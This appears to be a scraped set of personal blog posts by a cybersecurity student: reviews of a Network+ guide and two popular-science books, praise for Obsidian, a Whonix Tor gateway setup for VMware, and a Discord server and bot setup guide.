Take your exam prep to the next level with Sybex’s superior interactive online study tools. To access our learning environment, simply visit http://www.wiley.com/go/netplustestprep, type in your unique PIN, and instantly gain one year of FREE access to:

*Interactive test bank with 2 practice exams. Practice exams help you identify areas where further review is needed. Get more than 90% of the answers correct, and you’re ready to take the certification exam.

• 100 electronic flashcards to reinforce learning and last-minute prep before the exam.
• Comprehensive glossary in PDF format gives you instant access to the key terms so you are fully prepared.

ABOUT THE COMPTIA NETWORK+ PROGRAM

CompTIA’s Network+ is a vendor-neutral networking certification that validates the knowledge and skills to troubleshoot, configure and manage common wired and wireless networks. CompTIA Network+ is accredited by ANSI as meeting the ISO/IEC 17024 standard, and is approved by U.S. Department of Defense (DoD) to fulfill Directive 8570.01-M requirements. It is compliant with government regulations under the Federal Information Security Management Act (FISMA). Visit www.certification.comptia.org for more information.

About the Author

Todd Lammle, Network+, CCSI, CCNA, CCNP, is the networking authority. He has been involved in computers and networking with Fortune 500 companies for almost 30 years. Todd is President of GlobalNet System Solutions, Inc., a networking integration and training firm. He is the bestselling author of numerous titles, with over 900,000 copies of his books in print. He can be reached through his website at www.lammle.com.

Book Details

Author: Todd Lammle

Category: Computer Networks, Computer & Technology Certification Guides

Publisher: Sybex; 4th edition (May 8, 2018)

Paperback: 1008 pages

My Comment

This is a huge book about computer networking and it is absolutely necessary for a Penetration Tester or Ethical Hacker to have a good understanding of most of the topics discussed in this book, so if you are a newcomer to this field, I highly recommend this book, you may skip some parts according to your field of work, for example if you want to work in Web Application Security field, you can only read the parts that are related to your field but I absolutely recommend reading it from cover to cover. The OSI model, the IP address classes, Subnetting, Network Devices and Topologies, Routing Protocols and many other topics are necessary knowledge you must have if you want to become a successful ethical hacker.

References

In rare moments, an application is found which works great and also feels great to work with; Obsidian is one of those rare gems. It is a powerful knowledge base on top of a local folder of plain text Markdown files. If you want to start a project, research on a topic or prepare for an exam, you can use it as your personal knowledge management to store your notes and organize your thinking and have a more effective learning experience. There are many alternatives for note taking or personal knowledge management with different features and flavors like: Notion, Joplin, CherryTree, Roam Research, Typora, KeepNote, OneNote, Evernote… Each has its own pros and cons, Obsidian has some great characteristics that I really liked:

• The UI feels great. It has many themes that you can use to customize the environment to your liking.

• It doesn’t impose its structure and format on you, because it doesn’t have any rigid structure like Notation outlines and other applications: You are the real boss here! You can decide how to structure your data and your thinking. It is very important because in the long run, applications that we use also shape us and direct our thinking in specific ways or add some limitations to our thinking because of their specific formats.
• You use it locally and offline so you have total control on your data.
• There is no vendor lock-in problem because your notes are stored as plain text files so they are highly portable and you can use any other software for their management in the future if you want.
• It’s free! Yes all of the core features are free and you don’t need to pay for them.
• It uses Markdown language for text formatting, if you are familiar with Markdown, you feel at home, you can also use HTML syntax and it supports CSS and many JavaScript libraries like PrismJS… It uses Mermaid language for drawing diagrams and graphs.

• It has many great official and community plugins, I personally don’t use community plugins for security reasons but it also has many official plugins and new ones are developed constantly.
• It draws a graph of your notes and their relations which is super cool and helpful in organizing your thoughts and have a visual view of all of your tasks, here is one of my graphs that it has drawn from my notes and their connections:

When you zoom in you see:

So it is a great app that I really like, I used to use OneNote, and it is also good but the UI of Obsidian is more smooth and it also has better features and characteristics that are vital to my work. I think part of the decision to choose an app over another one is also personal and in the end, you need to try it yourself and see how it suits you or your needs or if you liked the experience or not.

I have a tight schedule to study for multiple Cybersecurity Certifications and exams starting from OSCP and also my researches and works. You need your tools prepared to be more effective, one of them can be Obsidian, another great one is GreenShot which I use for screen shots and sending pictures to my Obsidian notes.

I also highly recommend that you open GitHub or GitLab private repositories to save a copy of your notes so you don’t risk losing them, here are mine:

The Command Center is the core of my life, my daily tasks and my goals and research topics. The Certification is another repository that I use to follow my different certification study paths, I use a new Obsidian vault for each certification that I want to get, for example I created a new vault for my OSCP journey.

I hope I have been able to show you some parts of this great program, try it for yourself, it’s free and use it if you enjoyed your experience. In order to get started, visit Obsidian website and download it, then start from its local help to get started fast.

References

This Youtube channel has great tips for Privacy and Anonymity.

External Links

• Techlore Youtube Channel

Whonix Tor Gateway

You can anonymize all of your web requests by using Whonix Tor Gateway. You download and use a Whonix VirtualBox VM which is a hardened Linux distro and this VM can act as your Tor gateway for all of your web requests, it is great because it prevents possible DNS and IP leaks which can happen with most of VPNs and it also uses Tor network.

Using Whonix Tor Gateway with your VMware Workstation VMs

Whonix Tor gateway VM is a VirtualBox VM, you can use it with other VirtualBox VMs without any configuration but in order to use it with your VMware VMs you must set up your Whonix VM network and VMware network like the following:

First set up the necessary Whonix VM network adapters:

Don’t change this default network adapter:

Add a secondary network adapter or edit it like this if it already exists:

Next step is to be able to use this network in VMware workstation:

Go to Edit -> Virtual Network Editor… and add a new network like the selected one in the picture:

Now you can use Whonix Tor Gateway in your VMware VMs. Just do the network config necessary to connect to this network in each of your VMs that you want to use this Tor gateway. You must set IP,Netmask and Gateway according the network that is set in your Whonix, Your Gateway address is the Whonix Tor Gateway IP, and also set your DNS settings according to Whonix Tor gateway.

After connection, use: WhatIsMyIPAddress and DNSLeakTest to make sure that you are using Tor gateway and there’s no info leak.

Tips

1. You must pay attention that this does not prevent browser leak and user mistakes that may happen while using web.

2. Read every Whonix Document that you can! They are great and feel like the best possible classroom for anyone in any level of knowledge! Besides Whonix setup itself, they can teach you a lot about different technical aspects of digital privacy and anonymity and related risks that exist. Most of them are highly technical and only suitable for advanced users.

3. There are many ways to set up Whonix. Use Whonix Documentation for more info.

References

At last I did it! I had Discord account and even a simple server for some years but never put in the necessary effort to fully set up and customize my server. Finally I’ve put some time this week (maybe around 100 hours!! Yeah it’s no joke if you want a great server!) to set up and complete my own Discord server. For those of you who may not know, Discord is a VoIP platform for being in touch with friends, teammates and new people, build your own community and…, It was initially launched for gamers for them to have real-time communications in online team games but it has expanded more and now includes many other work, research, teamwork communities. It has all the capabilities of Whatsapp, Signal, Telegram… combined and even many more! It’s very amazing, I really can’t understand why it hasn’t got enough publicity and recognition that it deserves. I guess it will in the following years.

As you may already know from About Me section, one area of my expertise is VoIP systems and I confirm that this platform has almost all of the VoIP capabilities, and the great thing is that it’s free! Yeah you can pay and boost your server but you don’t have to and you can have a fully functioning server for free! And the limitation in customizing your server is in your own imagination!

Capabilities of Discord

• Building text and voice channels and have text chat and voice/video conference with many people at the same time.
• Share your desktop/files… with many people.
• Call your friends and contacts like Whatsapp, Signal…
• Allow other users and mods to create their own channels… and customize your server space!
• Great teamwork and collaboration capabilities like Slack but much more fun and feature-rich services. You can create Threads in text channels for specific discussions to avoid clutter and disorder in your channels.
• Assign different roles to different members and have different permissions and access controls for each role type.
• Almost unlimited amount of pre-made bots to manage any aspect of your server: Security Bots: Anti-DDoS, Anti-Raid, Anti-Nuke, Suspicious Behavior and Anomaly Detection, Anti-Spam and many other Chat and Server Moderation options. Server Stats bots: show a real-time stats of your server to visitors: persons online, bots online, the number of rooms, roles, the number of different roles online… Music bots to get music commands from server visitors and members and play the music they like, Reaction Roles bots to add the capability of users getting their own favorite roles by interacting with robots. Have some bots to interact with people and welcome them to server and guide them to different sections of the server. Leveling bots to add more fun to your server and give XP to active persons in chat and level them up, so higher levels can get new roles, rewards, services that you created, automatically…
• Building your own bots and attach them to your server with Webhooks to have fully customized, manageable new functionalities that you can’t find in existing bots. Great and so much fun for developers! So as you can see, you can have a fully automated server that almost all of the management tasks are done by robots!
• Link your Discord server to automation services like Zapier and publish your new RSS feeds of your website, your favorite websites or your new tweets, Github commits, your new Youtube videos, When you start your stream on Twitch,Youtube… automatically to an assigned announcement channel on Discord so your Discord audience are informed almost instantly and join you on your other platform. Any other visitor and Discord user can also follow your announcements if you assign enough permissions for new visitors. This automation aspect is in my opinion one of the interesting capabilities of Discord.
• You can have server admins and mods to manage your server and assign related permissions to them.
• You can build private channels for important bot logs for server management. And much more.

I’m really excited about this platform as it has unlimited features but although the whole process of building a simple server is easy and fast, it takes time to fully customize and configure your server but it is definitely worth the effort. So start building your own Discord server now! :)

My Discord Server

Have a look at my Discord server and join if you like.

The default role is Guest now with limited permissions and most of my server rooms and services are hidden to guest role but I give roles with more permissions to anyone who wants to explore more so come and join me on my Discord journey ;)!

I should also mention that this platform has normal encryption mechanisms and is not intended for secure end-to-end encryption connections but it’s ok for normal use if you properly set up your server security mechanisms and use a trusted VPN for your connections.

Useful Discord Bots Tips

And finally I have some tips about some useful Discord bots that I used, These tips may make your sever setup more smooth and faster:

1) Double Counter Controls Discord Server entry and prevents alt accounts, Robots and users who want to join with VPN from getting a guest role after joining server. You can turn on your VPN after this first human verification mechanism is done.

2) Wick prevents suspicious and malicious behaviors from mods and all other users and other bots and has anti-nuking, anti-raid… and many other security features that can be set up in its web dashboard.

3) Dyno prevents user spam and bad words and…, it warns/mutes/kicks/bans bad users. It has web panel.

Update 12/25/2022:

I’ve also created a form with Dyno, it consists of some questions that new joined users are required to answer. The answers are posted to a hidden management channel in the server for being reviewed by admins.

4) Arcane is used for leveling users. It has web panel.

5) Tatsu is also used for leveling users. It has many more features, It creates a really cool atmosphere for your server and can make it much more fun and interactive for users.

5) Yagpdb is used for Reaction Roles. It has web panel.

6) ServerStats is used for your server stats.

7) Mee6 is used for many purposes: welcome message, some server stats, custom commands, Server audit logs… It has web panel.

Update 12/25/2022:

8) FredBoat and 24/7 bots are used for playing music in channels.

9) IFTTT is used for automation, I use it now to announce my new website posts and my latest Github commits in some announcement channels in the Discord server. Also I use IFTTT service to announce my latest website posts in my X.

References

If you want to learn how to use Jekyll with Github pages to build your own website or blog, one of cool resources is these Up and Running series from Bill Raymond’s youtube page. He teaches great tips that can really make your design process easier.

External Links

• Up and Running with GitHub Pages, Part 1, Overview

• How to install a local Jekyll dev environment

• Up and Running with GitHub Pages, Part 2, The Basics

• Up and Running with GitHub Pages, Part 3, Blogging with Jekyll

Great tips on how to pass the OSCP exam.

External Links

• My OSCP Journey - A Review

Amazon Description

“Why We Sleep is an important and fascinating book…Walker taught me a lot about this basic activity that every person on Earth needs. I suspect his book will do the same for you.” —Bill Gates

A New York Times bestseller and international sensation, this “stimulating and important book” (Financial Times) is a fascinating dive into the purpose and power of slumber.

Sleep is one of the most important but least understood aspects of our life, wellness, and longevity. Until very recently, science had no answer to the question of why we sleep, or what good it served, or why we suffer such devastating health consequences when we don’t sleep. Compared to the other basic drives in life—eating, drinking, and reproducing—the purpose of sleep remained elusive.

An explosion of scientific discoveries in the last twenty years has shed new light on this fundamental aspect of our lives. Now, preeminent neuroscientist and sleep expert Matthew Walker gives us a new understanding of the vital importance of sleep and dreaming. Within the brain, sleep enriches our ability to learn, memorize, and make logical decisions. It recalibrates our emotions, restocks our immune system, fine-tunes our metabolism, and regulates our appetite. Dreaming mollifies painful memories and creates a virtual reality space in which the brain melds past and present knowledge to inspire creativity.

Walker answers important questions about sleep: how do caffeine and alcohol affect sleep? What really happens during REM sleep? Why do our sleep patterns change across a lifetime? How do common sleep aids affect us and can they do long-term damage? Charting cutting-edge scientific breakthroughs, and synthesizing decades of research and clinical practice, Walker explains how we can harness sleep to improve learning, mood, and energy levels; regulate hormones; prevent cancer, Alzheimer’s, and diabetes; slow the effects of aging; increase longevity; enhance the education and lifespan of our children, and boost the efficiency, success, and productivity of our businesses. Clear-eyed, fascinating, and accessible, Why We Sleep is a crucial and illuminating book.”

Editorial Reviews

Review

“A thoughtful tour through the still dimly understood state of being asleep … Why We Sleep is a book on a mission. Walker is in love with sleep and wants us to fall in love with sleep, too. And it is urgent. He makes the argument, persuasively, that we are in the midst of a ‘silent sleep loss epidemic’ that poses ‘the greatest public health challenge we face in the 21st century’ … Why We Sleep mounts a persuasive, exuberant case for addressing our societal sleep deficit and for the virtues of sleep itself. It is recommended for night-table reading in the most pragmatic sense.” —New York Times Book Review

“The director of UC Berkeley’s Sleep and Neuroimaging Lab explores the purpose of slumber. Understanding the ‘why,’ it turns out, just might help you with the ‘how to.’” —People

“A neuroscientist has found a revolutionary way of being cleverer, more attractive, slimmer, happier, healthier and of warding off cancer — a good night’s shut-eye … It’s probably a little too soon to tell you that Why We Sleep saved my life, but I can tell you that it’s been an eye-opener.” —The Guardian

“This is a stimulating and important book which you should read in the knowledge that the author is, as he puts it, ‘in love with everything that sleep is and does.’ But please do not begin it just before bedtime.” —Financial Times

“Fascinating … Walker describes how our resting habits have changed throughout history; the connection between sleep, chronic disease, and life span; and why the pills and aids we use to sleep longer and deeper are actually making our nights worse. Most important, he gives us simple, actionable ways to get better rest—tonight.” —Men’s Journal

“Walker is a scientist but writes for the layperson, illustrating tricky concepts with easily grasped analogies. Of particular interest to business owners, educators, parents, and government officials, and anyone who has ever suffered from a poor night’s sleep.” —Library Journal, starred review

“Why We Sleep is simply a must-read. World-renowned neuroscientist and sleep expert Matthew Walker takes us on a fascinating and indispensable journey into the latest understandings of the science of sleep. And the book goes way beyond satisfying intellectual curiosity, as it explores the cognitive, health, safety and business consequences of compromising the quality and quantity of our sleep; insights that may change the way you live your life. In these super-charged, distracting times it is hard to think of a book that is more important to read than this one.” —Adam Gazzaley,co-author of The Distracted Mind, founder and executive director of Neuroscape, and Professor of Neurology, Physiology, and Psychiatry at University of California, San Francisco

“Most of us have no idea what we do with a third of our lives. In this lucid and engaging book, Matt Walker explains the new science that is rapidly solving this age-old mystery. Why We Sleep is a canny pleasure that will have you turning pages well past your bedtime.” —Daniel Gilbert, professor of psychology at Harvard and author of Stumbling on Happiness

“In Why We Sleep, Dr. Matt Walker brilliantly illuminates the night, explaining how sleep can make us healthier, safer, smarter, and more productive. Clearly and definitively, he provides knowledge and strategies to overcome the life-threatening risks associated with our sleep-deprived society. Our universal need for sleep ensures that every reader will find value in Dr. Walker’s insightful counsel.” —Mark R. Rosekind, Ph.D., former NHTSA Administrator, NTSB member, and NASA scientist

About the Author

Matthew Walker is a professor of neuroscience and psychology at UC Berkeley, the Director of its Sleep and Neuroimaging Lab, and a former professor of psychiatry at Harvard University. He has published over 100 scientific studies and has appeared on 60 Minutes, Nova, BBC News, and NPR’s Science Friday. Why We Sleep is his first book.

Book Details

Author: Matthew Walker

Category: Neuroscience, Sleep Disorders

Publisher: Scribner; 1st edition (October 1, 2017)

My Comment

Why do we and almost all living things sleep? Why is it necessary?

What are the dangers of sleeping less that 6-7 hours even for a single night?

How can enough sleep help us be more productive and fulfilling in life and achieve more in less time?

How does lack of sleep affect our learning abilities?

In this book you’ll find answers to these and many other important questions about sleep from the latest discoveries of Neuroscience field.

References

Amazon Description

“Virus of the Mind is the first popular book devoted to the science of memetics, a controversial new field that transcends psychology, biology, anthropology, and cognitive science. Memetics is the science of memes, the invisible but very real DNA of human society. In Virus of the Mind, Richard Brodie carefully builds on the work of scientists Richard Dawkins, Douglas Hofstadter, Daniel Dennett, and others who have become fascinated with memes and their potential impact on our lives. But Richard goes beyond science and dives into the meat of the issue: is the emergence of this new science going to have an impact on our lives like the emergence of atomic physics did in the Cold War? He would say the impact will be at least as great. While atomic bombs affect everybody’s life, viruses of the mind touch lives in a more personal and more pernicious way. Mind viruses have already infected governments, educational systems, and inner cities, leading to some of the most pervasive and troublesome problems of society today: youth gangs, the welfare cycle, the deterioration of the public schools, and ever-growing government bureaucracy. Viruses of the mind are not a future worry: they are here with us now and are evolving to become better and better at their job of infecting us. The recent explosion of mass media and the information superhighway has made the earth a prime breeding ground for viruses of the mind. Will there be a mental plague? Will only some of us survive with our free will intact? Richard Brodie weaves together science, ethics, and current events as he raises these and other very disturbing questions about memes.”

Book Details

Author: Richard Brodie

Category: Sociology, Evolution

Publisher: Hay House; Reissue edition (February 15, 2011)

My Comment

This book talks about a new scientific field which is very interesting: Memetics and Mind Viruses.

Like Biologic and Computer Viruses, there are also Mind Viruses which can be seen in our world today.

This books is continuation of Richard Dawkins’ idea about Memes from The Selfish Gene book chapter 11.

It is highly recommended if you are interested in how some ideas become viral and infect millions of minds unconsciously and sometimes irrevocably, exactly the same as some computer rootkits and viruses or even biological viruses.

The author is a former Microsoft developer who has dedicated his life to this and also personal improvement field after his retirement from Microsoft.

References